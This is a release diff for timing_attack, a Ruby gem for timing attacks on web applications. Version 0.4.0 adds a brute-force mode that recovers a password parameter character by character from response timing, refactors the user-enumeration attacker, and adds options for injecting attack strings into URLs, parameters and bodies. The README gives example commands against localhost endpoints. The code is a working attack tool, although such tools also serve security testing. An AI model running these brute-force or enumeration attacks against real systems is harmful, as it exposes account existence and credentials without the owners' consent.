timing_attack 0.3.0 → 0.4.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 8bdfcbf107fd5fffba64e424a8cce2d85a31ee8b
-  data.tar.gz: b6f3b3eed4f88b493e676d651c9b3a8a669c8c56
+  metadata.gz: f4aa7a2b7ae3b9a7bf2b6d39d586d3484aa83d7e
+  data.tar.gz: 3432f10030dbb838b9ff224d4c7942f8fb82392a
 SHA512:
-  metadata.gz: 663c64fb49012a9ba42836eecc1a4974983a65c578599ad71c6e7fb43654e855503f5d2dc8dd0469ca2916eb01e10935463ad32899e6be78eddee58b74085918
-  data.tar.gz: 1411e2f1eb5f1e565314ad20c9eeee2258b530fc2c87686fde4df078ec6bc52d85573637aca5f6efa8587f29f2dfab5cb011c385cb88fb360d4cbdc809a35b5f
+  metadata.gz: 635ff7244a86461d6531034e54a607b0c91973c5d1a31631e571860b3eca132ce770753dce0973ab4d798a4aed209d9567bdaf7bca75901fa52f4dc8c94aa5fc
+  data.tar.gz: 0d7d00c315e3bdc7f947c4ba1294f2810a4bd901a225bdc2655e51d4807ceebc785e7d85ace2d02d442088aa5b7f14eb66e2579c97cd5fd89fa4a4dc9ba7e4f1

data/README.md

@@ -19,7 +19,10 @@ timing_attack [options] -u <target> <inputs>
     -t, --threshold NUM              Minimum threshold, in seconds, for meaningfulness (default: 0.025)
     -p, --post                       Use POST, not GET
     -q, --quiet                      Quiet mode (don't display progress bars)
-        --percentile N               Use Nth percentile for calculations (default: 3)
+        --brute_force                Brute force mode
+        --parameters STR             JSON hash of parameters.  'INPUT' will be replaced with the attack string
+        --body STR                   JSON of body paramets to be sent to Typhoeus.  'INPUT' will be replaced with the attack string
+        --percentile NUM             Use NUMth percentile for calculations (default: 3)
         --mean                       Use mean for calculations
         --median                     Use median for calculations
     -v, --version                    Print version information
@@ -28,34 +31,51 @@ timing_attack [options] -u <target> <inputs>
 
 Note that setting concurrency too high can add significant jitter to your results.  If you know that your inputs contain elements in both long and short response groups but your results are bogus, try backing off on concurrency.  The default value of 15 is a good starting place for robust remote targets, but you might need to dial it back to as far as 1 (especially if you're attacking a single-threaded server)
 
-### An example
+For the `url`, `body`, and `parameters` options, the string `INPUT` can be included.  It will be replaced with the current test string.
+
+The `body` and `parameters` options take objects serialized with JSON.
+
+### Enumeration
 
 Consider that we we want to gather information from a Rails server running
 locally at `http://localhost:3000`.  Let's say that we know the following:
 * `charles@poodles.com` exists in the database
 * `invalid@fake.fake` does not exist in the database
 
-And we want to know if `candidate@address.com` and `other@address.com` exist in
+And we want to know if `bactrian@dev.null` and `alpaca@dev.null` exist in
 the database.
 
 We execute (using `-q` to suppress the progress bar)
 ```bash
-% timing_attack -q -u http://localhost:3000/login \
-                candidate@address.com other@address.com \
+% timing_attack -q -u 'http://localhost:3000/timing/conditional_hashing?login=INPUT&password=123' \
+                bactrian@dev.null alpaca@dev.null \
                 charles@poodles.com invalid@fake.fake
 ```
 ```
 Short tests:
-  other@address.com             0.0926
-  invalid@fake.fake             0.0947
+  invalid@fake.fake             0.0031
+  alpaca@dev.null               0.0033
 Long tests:
-  candidate@address.com         0.1708
-  charles@poodles.com           0.1823
+  bactrian@dev.null             0.1037
+  charles@poodles.com           0.1040
 ```
 
 Note that you don't need to know anything about the database when attacking.  It
 is, however, nice to have a bit of information as a sanity check.
 
+### Brute Forcing
+
+Consider that we know the endpoint
+`http://localhost:3000/timing/string_comparison` is vulnerable to a timing
+attack due to an early return in string comparison.  We can attack it with
+```bash
+timing_attack -u http://localhost:3000/timing/string_comparison \
+              --parameters '{"password":"INPUT"}' \
+              --brute_force
+```
+This will attempt a brute-force timing attack against against the `password`
+parameter.
+
 ## How it works
 
 The various inputs are each thrown at the endpoint `--number` times.  The
@@ -81,14 +101,11 @@ Bug reports and pull requests are welcome [here](https://github.com/ffleming/tim
 
 ## Disclaimer
 
-TimingAttack is quick and dirty.
+timing_attack is quick and dirty.
 
-Also, don't use TimingAttack against machines that aren't yours.
+Also, don't use timing_attack against machines that aren't yours.
 
 ## Todo
 * Tests
 * More intelligent filtering than nth-percentile + spike detection
   * CW&R's box test
-* Customizable query parameters
-* Threading for requests?
-  * Custom or just use Typhoeus

data/exe/timing_attack

@@ -1,6 +1,5 @@
 #!/usr/bin/env ruby
 require 'timing_attack'
-require 'optparse'
 
 options = {}
 opt_parser = OptionParser.new do |opts|
@@ -18,7 +17,14 @@ opt_parser = OptionParser.new do |opts|
   end
   opts.on("-p", "--post", "Use POST, not GET") { |bool| options[:method] = bool ? :post : :get }
   opts.on("-q", "--quiet", "Quiet mode (don't display progress bars)") { |bool| options[:verbose] = !bool }
-  opts.on("--percentile N", "Use Nth percentile for calculations (default: 3)") { |num| options[:percentile] = num.to_i }
+  opts.on("--brute_force", "Brute force mode") { |bool| options[:brute_force] = bool }
+  opts.on("--parameters STR", "JSON hash of parameters.  'INPUT' will be replaced with the attack string") do |str|
+    options[:params] = JSON.parse(str)
+  end
+  opts.on("--body STR", "JSON of body paramets to be sent to Typhoeus.  'INPUT' will be replaced with the attack string") do |str|
+    options[:body] = JSON.parse(str)
+  end
+  opts.on("--percentile NUM", "Use NUMth percentile for calculations (default: 3)") { |num| options[:percentile] = num.to_i }
   opts.on("--mean", "Use mean for calculations") { |bool| options[:mean] = bool }
   opts.on("--median", "Use median for calculations") { |bool| options[:median] = bool }
   opts.on_tail("-v", "--version", "Print version information") do
@@ -46,10 +52,17 @@ elsif options[:mean]
 end
 
 begin
-  atk = TimingAttack::CliAttacker.new(inputs: ARGV, options: options)
+  atk = if options.delete(:brute_force)
+          TimingAttack::BruteForcer.new(options: options)
+        else
+          TimingAttack::Enumerator.new(inputs: ARGV, options: options)
+        end
   atk.run!
 rescue ArgumentError => e
   STDERR.puts e.message
   puts opt_parser
   exit
+rescue Interrupt => e
+  puts "\nCaught interrupt, exiting"
+  exit
 end

data/lib/timing_attack/attacker.rb

@@ -0,0 +1,35 @@
+module TimingAttack
+  module Attacker
+    def run!
+      if verbose?
+        puts "Target: #{url}"
+        puts "Method: #{method.to_s.upcase}"
+        puts "Parameters: #{params.inspect}" unless params.empty?
+        puts "Body: #{body.inspect}" unless body.empty?
+      end
+      attack!
+    end
+
+    private
+    attr_reader :attacks, :options
+
+    %i(iterations url verbose width method mean percentile threshold concurrency params body).each do |sym|
+      define_method(sym) { options.fetch sym }
+    end
+    alias_method :verbose?, :verbose
+
+    def default_options
+      {
+        verbose: true,
+        method: :get,
+        iterations: 50,
+        mean: false,
+        threshold: 0.025,
+        percentile: 3,
+        concurrency: 15,
+        params: {},
+        body: {},
+      }.freeze
+    end
+  end
+end

data/lib/timing_attack/brute_forcer.rb

@@ -0,0 +1,60 @@
+module TimingAttack
+  class BruteForcer
+    include TimingAttack::Attacker
+
+    def initialize(options: {})
+      @options = default_options.merge(options)
+      raise ArgumentError.new("Must provide :url key") if url.nil?
+      @known = ""
+    end
+
+    private
+
+    attr_reader :known
+    POTENTIAL_BYTES = (' '..'z').to_a
+    def attack!
+      while(true)
+        attack_byte!
+      end
+    end
+
+    def attack_byte!
+      @attacks = POTENTIAL_BYTES.map do |byte|
+        TimingAttack::TestCase.new(input: "#{known}#{byte}",
+                                   options: options)
+      end
+      run_attacks_for_single_byte!
+      process_attacks_for_single_byte!
+    end
+
+    def run_attacks_for_single_byte!
+      hydra = Typhoeus::Hydra.new(max_concurrency: concurrency)
+      iterations.times do
+        attacks.each do |attack|
+          req = attack.generate_hydra_request!
+          req.on_complete do |response|
+            print "\r#{' ' * (known.length + 4)}"
+            output.increment
+            print " '#{known}'"
+          end
+          hydra.queue req
+        end
+      end
+      hydra.run
+    end
+
+    def process_attacks_for_single_byte!
+      attacks.each(&:process!)
+      grouper = Grouper.new(attacks: attacks, group_by: { percentile: options.fetch(:percentile) })
+      results = grouper.long_tests.map(&:input)
+      if grouper.long_tests.count > 1
+        raise StandardError.new("Got too many possibilities: #{results.join(', ')}")
+      end
+      @known = results.first
+    end
+
+    def output
+      @output ||= TimingAttack::Spinner.new
+    end
+  end
+end

data/lib/timing_attack/{cli_attacker.rb → enumerator.rb}

@@ -1,25 +1,24 @@
 module TimingAttack
-  class CliAttacker
+  class Enumerator
+    include TimingAttack::Attacker
+
     def initialize(inputs: [], options: {})
-      @options = DEFAULT_OPTIONS.merge(options)
+      @inputs = inputs
+      @options = default_options.merge(options)
       raise ArgumentError.new("url is a required argument") unless options.has_key? :url
       raise ArgumentError.new("Need at least 2 inputs") if inputs.count < 2
       raise ArgumentError.new("Iterations can't be < 3") if iterations < 3
-      unless @options.has_key? :width
-        @options[:width] = inputs.dup.map(&:length).push(30).sort.last
-      end
       @attacks = inputs.map { |input| TestCase.new(input: input, options: @options) }
     end
 
     def run!
-      puts "Target: #{url}" if verbose?
-      attack!
-      puts report
+     super
+     puts report
     end
 
     private
 
-    attr_reader :attacks, :options, :grouper
+    attr_reader :grouper, :inputs
 
     def report
       ret = ''
@@ -43,7 +42,7 @@ module TimingAttack
         attacks.each do |attack|
           req = attack.generate_hydra_request!
           req.on_complete do |response|
-            attack_bar.increment
+            output.increment
           end
           hydra.queue req
         end
@@ -62,22 +61,14 @@ module TimingAttack
       @grouper = Grouper.new(attacks: attacks, group_by: group_by)
     end
 
-    def attack_bar
+    def output
       return null_bar unless verbose?
-      @attack_bar ||= ProgressBar.create(title: "  Attacking".ljust(15),
+      @output ||= ProgressBar.create(title: "  Attacking".ljust(15),
                                          total: iterations * attacks.length,
                                          format: bar_format
                                         )
     end
 
-    def benchmark_bar
-      return null_bar unless verbose?
-      @benchmark_bar ||= ProgressBar.create(title: "  Benchmarking".ljust(15),
-                                            total: iterations * 2,
-                                            format: bar_format
-                                           )
-    end
-
     def bar_format
       @bar_format ||= "%t (%E) |%B|"
     end
@@ -87,19 +78,10 @@ module TimingAttack
       @null_bar ||= @null_bar_klass.new
     end
 
-    %i(iterations url verbose width method mean percentile threshold concurrency).each do |sym|
-      define_method(sym) { options.fetch sym }
+    def default_options
+      super.merge(
+        width: inputs.dup.map(&:length).push(30).sort.last,
+      ).freeze
     end
-    alias_method :verbose?, :verbose
-
-    DEFAULT_OPTIONS = {
-      verbose: false,
-      method: :get,
-      iterations: 50,
-      mean: false,
-      threshold: 0.025,
-      percentile: 3,
-      concurrency: 15
-    }.freeze
   end
 end

data/lib/timing_attack/spinner.rb

@@ -0,0 +1,12 @@
+module TimingAttack
+  class Spinner
+
+    STATES = %w(| / - \\)
+    def increment
+      @spinner_i ||= 0
+      @spinner_i += 1
+      print "\r #{STATES[@spinner_i % STATES.length]}"
+    end
+  end
+end
+

data/lib/timing_attack/test_case.rb

@@ -1,5 +1,8 @@
+require 'uri'
 module TimingAttack
   class TestCase
+    INPUT_FLAG = "INPUT"
+
     attr_reader :input
     def initialize(input: , options: {})
       @input = input
@@ -7,17 +10,21 @@ module TimingAttack
       @times = []
       @percentiles = []
       @hydra_requests = []
+      @url = URI.escape(
+        options.fetch(:url).
+        gsub(INPUT_FLAG, input)
+      )
+      @params = params_from(options.fetch :params, {})
+      @body = params_from(options.fetch :body, {})
     end
 
     def generate_hydra_request!
       req = Typhoeus::Request.new(
-        options.fetch(:url),
+        url,
         method: options.fetch(:method),
-        params: {
-          login: input,
-          password: "test" * 1000
-        },
-        followlocation: true
+        followlocation: true,
+        params: params,
+        body: body
       )
       @hydra_requests.push req
       req
@@ -47,6 +54,21 @@ module TimingAttack
 
     private
 
-    attr_reader :times, :options, :percentiles
+    def params_from(obj)
+      case obj
+      when String
+        obj.gsub(INPUT_FLAG, input)
+      when Symbol
+        params_from(obj.to_s).to_sym
+      when Hash
+        Hash[obj.map {|k, v| [params_from(k), params_from(v)]}]
+      when Array
+        obj.map {|el| params_from(el) }
+      else
+        obj
+      end
+    end
+
+    attr_reader :times, :options, :percentiles, :url, :params, :body
   end
 end

data/lib/timing_attack/version.rb

@@ -1,3 +1,3 @@
 module TimingAttack
-  VERSION = "0.3.0"
+  VERSION = "0.4.0"
 end

data/lib/timing_attack.rb

@@ -1,9 +1,14 @@
 require 'typhoeus'
+require 'json'
+require 'optparse'
 require 'ruby-progressbar'
 require "timing_attack/version"
+require "timing_attack/attacker"
+require 'timing_attack/spinner'
+require "timing_attack/brute_forcer"
 require "timing_attack/grouper"
 require "timing_attack/test_case"
-require "timing_attack/cli_attacker"
+require "timing_attack/enumerator"
 
 module TimingAttack
 end

data/timing_attack.gemspec

@@ -22,6 +22,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency "ruby-progressbar", "~> 1.8"
   spec.add_runtime_dependency "typhoeus", "~> 1.1"
   spec.add_development_dependency "bundler", "~> 1.12"
+  spec.add_development_dependency "pry-byebug", "~> 3.4"
   spec.add_development_dependency "rake", "~> 10.0"
   spec.add_development_dependency "rspec", "~> 3.0"
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: timing_attack
 version: !ruby/object:Gem::Version
-  version: 0.3.0
+  version: 0.4.0
 platform: ruby
 authors:
 - Forrest Fleming
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2016-07-24 00:00:00.000000000 Z
+date: 2017-02-04 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: ruby-progressbar
@@ -52,6 +52,20 @@ dependencies:
     - - "~>"
       - !ruby/object:Gem::Version
         version: '1.12'
+- !ruby/object:Gem::Dependency
+  name: pry-byebug
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.4'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.4'
 - !ruby/object:Gem::Dependency
   name: rake
   requirement: !ruby/object:Gem::Requirement
@@ -99,8 +113,11 @@ files:
 - bin/setup
 - exe/timing_attack
 - lib/timing_attack.rb
-- lib/timing_attack/cli_attacker.rb
+- lib/timing_attack/attacker.rb
+- lib/timing_attack/brute_forcer.rb
+- lib/timing_attack/enumerator.rb
 - lib/timing_attack/grouper.rb
+- lib/timing_attack/spinner.rb
 - lib/timing_attack/test_case.rb
 - lib/timing_attack/version.rb
 - timing_attack.gemspec
@@ -124,7 +141,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
       version: '0'
 requirements: []
 rubyforge_project: 
-rubygems_version: 2.4.8
+rubygems_version: 2.5.2
 signing_key: 
 specification_version: 4
 summary: Perform timing attacks against web applications